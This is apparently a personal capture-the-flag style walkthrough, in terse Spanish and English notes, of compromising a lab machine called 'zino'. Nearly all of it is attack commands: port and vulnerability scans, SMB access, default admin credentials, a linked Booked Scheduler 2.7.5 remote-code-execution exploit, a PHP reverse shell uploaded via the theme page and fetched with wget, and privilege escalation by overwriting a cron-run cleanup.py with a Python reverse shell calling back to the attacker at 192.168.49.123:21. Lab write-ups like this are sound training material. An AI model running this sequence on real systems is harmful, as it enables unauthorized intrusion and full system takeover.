nmap -A -p- -oA zino 192.168.139.64 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA zino 192.168.139.64

nmap -sU -O -p- -oA zino-udp 192.168.139.64

nikto -h 192.168.139.64:80

Pasted image 20211001073025.png

Pasted image 20211001073531.png

smbclient \\\\192.168.139.64\\zino

Pasted image 20211001073452.png

cat misc.log

cat auth.log

Pasted image 20211001073641.png

https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF

Credenciales admin:adminadmin

Pasted image 20211001120638.png

http://192.168.xx.xx/Web/admin/manage_theme.php

Subimos el archivo con el reverse shell en la parte del medio donde dice favion.ico

Pasted image 20211005164624.png

https://github.com/artyuum/Simple-PHP-Web-Shell

python3 -m http.server 80

wget http://192.168.49.123:21/shell.php

Pasted image 20211005170443.png

Ejecutamos lo siguiente:

php shell.php

nc -lvnp 21

python3 -m http.server 21

Pasted image 20211006145843.png

En linpeas.sh vemos el archivo cleanup.py en /var/www/html/booked

Pasted image 20211006150323.png

cd /var/www/html/booked

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.123",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > cleanup.py

nc -lvnp 21

Pasted image 20211006151437.png

boxes

copyright©2022 Cu3rv0x all rights reserved